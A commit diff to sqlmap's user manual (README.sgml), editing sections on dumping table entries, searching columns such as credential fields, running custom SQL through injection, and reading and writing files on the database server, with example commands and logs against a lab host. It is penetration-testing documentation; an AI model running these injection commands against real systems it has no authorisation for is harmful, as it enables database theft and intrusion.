sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 17:46:37 +03:00
Code Issues Packages Projects Releases Wiki Activity

update

Browse Source
This commit is contained in:
Bernardo Damele 2010-03-03 22:02:48 +00:00
parent ef7666c12b
commit 63880e3121
1 changed files with 149 additions and 74 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

207
doc/README.sgml
View File

@ -325,7 +325,7 @@ custom application credentials.
<item>Support to <bf>run custom SQL statement(s)</bf> as in an interactive <item>Support to <bf>run custom SQL statement(s)</bf> as in an interactive
SQL client connecting to the back-end database. sqlmap automatically SQL client connecting to the back-end database. sqlmap automatically
dissects the provided statement, determins which technique to use to dissects the provided statement, determines which technique to use to
inject it and how to pack the SQL payload accordingly. inject it and how to pack the SQL payload accordingly.
</itemize> </itemize>
@ -3338,10 +3338,12 @@ Options: <tt>-</tt><tt>-dump</tt>, <tt>-C</tt>, <tt>-T</tt>, <tt>-D</tt>,
and <tt>-</tt><tt>-last</tt> and <tt>-</tt><tt>-last</tt>
<p> <p>
It is possible to dump the entries for a specific database table. It is possible to dump table entries.
This functionality depends on the option <tt>-T</tt> to specify the table This functionality depends on the option <tt>-T</tt> to specify the table
name or the option <tt>-C</tt> to specify the column name and optionally name or on the option <tt>-C</tt> to specify the column name and,
on <tt>-D</tt> to specify the database name. optionally on <tt>-D</tt> to specify the database name.
<p>
If the table name is specified, but the database name is not, the current If the table name is specified, but the database name is not, the current
database name is used. database name is used.
@ -3355,31 +3357,31 @@ $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --du
[...] [...]
back-end DBMS: MySQL >= 5.0.0 back-end DBMS: MySQL >= 5.0.0
[17:51:41] [WARNING] missing database parameter, sqlmap is going to use the current [hh:mm:41] [WARNING] missing database parameter, sqlmap is going to use the current
database to dump table 'users' entries database to dump table 'users' entries
[17:51:41] [INFO] fetching current database [hh:mm:41] [INFO] fetching current database
[17:51:41] [INFO] retrieved: testdb [hh:mm:41] [INFO] retrieved: testdb
[17:51:41] [INFO] fetching columns for table 'users' on database 'testdb' [hh:mm:41] [INFO] fetching columns for table 'users' on database 'testdb'
[17:51:41] [INFO] fetching number of columns for table 'users' on database 'testdb' [hh:mm:41] [INFO] fetching number of columns for table 'users' on database 'testdb'
[17:51:41] [INFO] retrieved: 3 [hh:mm:41] [INFO] retrieved: 3
[17:51:41] [INFO] retrieved: id [hh:mm:41] [INFO] retrieved: id
[17:51:41] [INFO] retrieved: name [hh:mm:41] [INFO] retrieved: name
[17:51:41] [INFO] retrieved: surname [hh:mm:41] [INFO] retrieved: surname
[17:51:41] [INFO] fetching entries for table 'users' on database 'testdb' [hh:mm:41] [INFO] fetching entries for table 'users' on database 'testdb'
[17:51:41] [INFO] fetching number of entries for table 'users' on database 'testdb' [hh:mm:41] [INFO] fetching number of entries for table 'users' on database 'testdb'
[17:51:41] [INFO] retrieved: 4 [hh:mm:41] [INFO] retrieved: 4
[17:51:41] [INFO] retrieved: 1 [hh:mm:41] [INFO] retrieved: 1
[17:51:42] [INFO] retrieved: luther [hh:mm:42] [INFO] retrieved: luther
[17:51:42] [INFO] retrieved: blissett [hh:mm:42] [INFO] retrieved: blissett
[17:51:42] [INFO] retrieved: 2 [hh:mm:42] [INFO] retrieved: 2
[17:51:42] [INFO] retrieved: fluffy [hh:mm:42] [INFO] retrieved: fluffy
[17:51:42] [INFO] retrieved: bunny [hh:mm:42] [INFO] retrieved: bunny
[17:51:42] [INFO] retrieved: 3 [hh:mm:42] [INFO] retrieved: 3
[17:51:42] [INFO] retrieved: wu [hh:mm:42] [INFO] retrieved: wu
[17:51:42] [INFO] retrieved: ming [hh:mm:42] [INFO] retrieved: ming
[17:51:43] [INFO] retrieved: 4 [hh:mm:43] [INFO] retrieved: 4
[17:51:43] [INFO] retrieved: [hh:mm:43] [INFO] retrieved:
[17:51:43] [INFO] retrieved: nameisnull [hh:mm:43] [INFO] retrieved: nameisnull
Database: testdb Database: testdb
Table: users Table: users
[4 entries] [4 entries]
@ -3418,6 +3420,84 @@ Table: users
+-------------------+ +-------------------+
</verb></tscreen> </verb></tscreen>
<p>
If only the column name is specified, sqlmap will enumerate and ask the
user to dump all databases' tables containing user provided column(s).
This feature can be useful to identify, for instance, tables containing
custom application credentials.
<p>
Example on a <bf>MySQL 5.0.67</bf> target:
<tscreen><verb>
$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" -v 1 --dump \
-C "urna"
[...]
back-end DBMS: MySQL >= 5.0.0
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 1
[19:18:08] [INFO] fetching databases with tables containing columns like 'urna'
[19:18:08] [INFO] fetching number of databases with tables containing columns like
'urna'
[19:18:08] [INFO] retrieved: 1
[19:18:08] [INFO] retrieved: testdb
[19:18:10] [INFO] fetching tables containing columns like 'urna' in database 'testdb'
[19:18:10] [INFO] fetching number of tables containing columns like 'urna' in
database 'testdb'
[19:18:10] [INFO] retrieved: 1
[19:18:10] [INFO] retrieved: users
[19:18:10] [INFO] fetching columns like 'urna' for table 'users' on database 'testdb'
[19:18:10] [INFO] fetching number of columns for table 'users' on database 'testdb'
[19:18:10] [INFO] retrieved: 1
[19:18:10] [INFO] retrieved: surname
Columns like 'urna' were found in the following databases:
Database: testdb
Table: users
[1 column]
+---------+
| Column |
+---------+
| surname |
+---------+
do you want to dump entries? [Y/n] y
which database(s)?
[a]ll (default)
[testdb]
[q]uit
>
which table(s) of database 'testdb'?
[a]ll (default)
[users]
[s]kip
[q]uit
>
[19:18:23] [INFO] fetching columns 'surname' entries for table 'users' on
database 'testdb'
[19:18:23] [INFO] fetching number of columns 'surname' entries for table
'users' on database 'testdb'
[19:18:23] [INFO] retrieved: 4
[19:18:23] [INFO] retrieved: blissett
[19:18:23] [INFO] retrieved: bunny
[19:18:23] [INFO] retrieved: ming
[19:18:23] [INFO] retrieved: nameisnull
Database: testdb
Table: users
[4 entries]
+------------+
| surname |
+------------+
| blissett |
| bunny |
| ming |
| nameisnull |
+------------+
</verb></tscreen>
<p> <p>
sqlmap also stores for each table the dumped entries in a CSV format file. sqlmap also stores for each table the dumped entries in a CSV format file.
You can see the absolute path where sqlmap stores the dumped tables entries You can see the absolute path where sqlmap stores the dumped tables entries
@ -3448,8 +3528,8 @@ Table: users
172.16.213.131/dump/public/users.csv' 172.16.213.131/dump/public/users.csv'
[...] [...]
$ cat /software/sqlmap/output/172.16.213.131/dump/public/users.csv $ cat ./output/172.16.213.131/dump/public/users.csv
"id","name","surname" id,name,surname
"1","luther","blissett" "1","luther","blissett"
"2","fluffy","bunny" "2","fluffy","bunny"
"3","wu","ming" "3","wu","ming"
@ -3459,13 +3539,13 @@ $ cat /software/sqlmap/output/172.16.213.131/dump/public/users.csv
<p> <p>
You can also provide the <tt>-</tt><tt>-start</tt> and/or the <tt>-</tt><tt>-stop</tt> You can also provide the <tt>-</tt><tt>-start</tt> and/or the <tt>-</tt><tt>-stop</tt>
options to limit the dump to a range of entries, while those entries can be further limited options to limit the dump to a range of entries, while those entries can be further
to a range of character positions provided with <tt>-</tt><tt>-first</tt> and/or the limited to a range of character positions provided with <tt>-</tt><tt>-first</tt>
<tt>-</tt><tt>-last</tt> options. and/or the <tt>-</tt><tt>-last</tt> options:
<itemize> <itemize>
<item><tt>-</tt><tt>-start</tt> specifies the first entry to enumerate <item><tt>-</tt><tt>-start</tt> specifies the first entry to enumerate.
<item><tt>-</tt><tt>-stop</tt> specifies the last entry to enumerate <item><tt>-</tt><tt>-stop</tt> specifies the last entry to enumerate.
</itemize> </itemize>
<p> <p>
@ -3478,19 +3558,19 @@ $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --du
Database: testdb Database: testdb
Table: users Table: users
[3 entries] [3 entries]
+----+----------------------------------------------+-------------------+ +----+--------------------------------------------+-------------------+
| id | name | surname | | id | name | surname |
+----+----------------------------------------------+-------------------+ +----+--------------------------------------------+-------------------+
| 2 | fluffy | bunny | | 2 | fluffy | bunny |
| 3 | wu | ming | | 3 | wu | ming |
| 4 | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header | | 4 | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header |
+----+----------------------------------------------+-------------------+ +----+--------------------------------------------+-------------------+
</verb></tscreen> </verb></tscreen>
<p> <p>
As you can see, sqlmap is very flexible. You can leave it to automatically As you can see, sqlmap is very flexible. You can leave it to automatically
enumerate the whole database table up to a single column of a specific enumerate the whole database table up to a range of characters of a single
table entry. column of a specific table entry.
<sect2>Dump all databases tables entries <sect2>Dump all databases tables entries
@ -3509,15 +3589,15 @@ $ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.php?id=1" --du
Database: testdb Database: testdb
Table: users Table: users
[5 entries] [5 entries]
+----+----------------------------------------------+-------------------+ +----+--------------------------------------------+-------------------+
| id | name | surname | | id | name | surname |
+----+----------------------------------------------+-------------------+ +----+--------------------------------------------+-------------------+
| 1 | luther | blissett | | 1 | luther | blissett |
| 2 | fluffy | bunny | | 2 | fluffy | bunny |
| 3 | wu | ming | | 3 | wu | ming |
| 4 | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header | | 4 | sqlmap/0.8 (http://sqlmap.sourceforge.net) | user agent header |
| 5 | NULL | nameisnull | | 5 | NULL | nameisnull |
+----+----------------------------------------------+-------------------+ +----+--------------------------------------------+-------------------+
Database: information_schema Database: information_schema
Table: CHARACTER_SETS Table: CHARACTER_SETS
@ -3620,21 +3700,23 @@ considered a system database because some database administrators use it
as a users' database. as a users' database.
<sect2>Run your own SQL statement <sect2>Execute your SQL statement
<p> <p>
Options: <tt>-</tt><tt>-sql-query</tt> and <tt>-</tt><tt>-sql-shell</tt> Options: <tt>-</tt><tt>-sql-query</tt> and <tt>-</tt><tt>-sql-shell</tt>
<p> <p>
The SQL query and the SQL shell features makes the user able to run The SQL query and the SQL shell features makes the user able to execute
custom SQL statement on the web application's back-end database management. custom SQL statements on the web application's back-end database
sqlmap recognizes the type of SQL statement provided and automatically management.
chooses which SQL injection technique to use for it to be able to execute it. sqlmap automatically dissects the provided statement, determines which
If it is a <tt>SELECT</tt> statement it will retrieve its output through technique to use to inject it and how to pack the SQL payload accordingly.
the blind SQL injection or UNION query SQL injection technique depending
on the user's options. Otherwise it will execute the query through the If it is a <tt>SELECT</tt> statement, sqlmap will retrieve its output
stacked query SQL injection technique if the web application supports through the blind SQL injection or UNION query SQL injection technique
multiple statements on the back-end database management system. depending on the user's options. Otherwise it will execute the query
through the stacked query SQL injection technique if the web application
supports multiple statements on the back-end database management system.
<p> <p>
Examples on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target: Examples on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
@ -3989,30 +4071,23 @@ the provided SQL statement in a multiple statement mode.
<p> <p>
Beware that some web application technologies do not support stacked Beware that some web application technologies do not support stacked
queries on specific database management systems. For instance, PHP does not queries on specific database management systems. For instance, PHP does
support stacked queries when the back-end DBMS is MySQL, but it does not support stacked queries when the back-end DBMS is MySQL, but it does
support when the back-end DBMS is PostgreSQL. support when the back-end DBMS is PostgreSQL.
<sect1>User-defined function injection <sect1>User-defined function injection
<sect2>Inject custom user-injection functions <sect2>Inject custom user-defined functions (UDF)
<p> <p>
Option: <tt>-</tt><tt>-udf-inject</tt> Options: <tt>-</tt><tt>-udf-inject</tt> and <tt>-</tt><tt>-shared-lib</tt>
#TODO
<sect2>Local path of the shared library
<p>
Option: <tt>-</tt><tt>-shared-lib</tt>
#TODO #TODO
<sect1>File system access <sect1>File system access
<sect2>Read a file from the back-end DBMS file system <sect2>Read a file from the database server's file system
<p> <p>
Option: <tt>-</tt><tt>-read-file</tt> Option: <tt>-</tt><tt>-read-file</tt>
@ -4135,7 +4210,7 @@ output/172.16.213.131/files/C__example.exe: PE32 executable for MS Windows (GUI)
</verb></tscreen> </verb></tscreen>
<sect2>Write a local file on the back-end DBMS file system <sect2>Write a local file on the database server's file system
<p> <p>
Options: <tt>-</tt><tt>-write-file</tt> and <tt>-</tt><tt>-dest-file</tt> Options: <tt>-</tt><tt>-write-file</tt> and <tt>-</tt><tt>-dest-file</tt>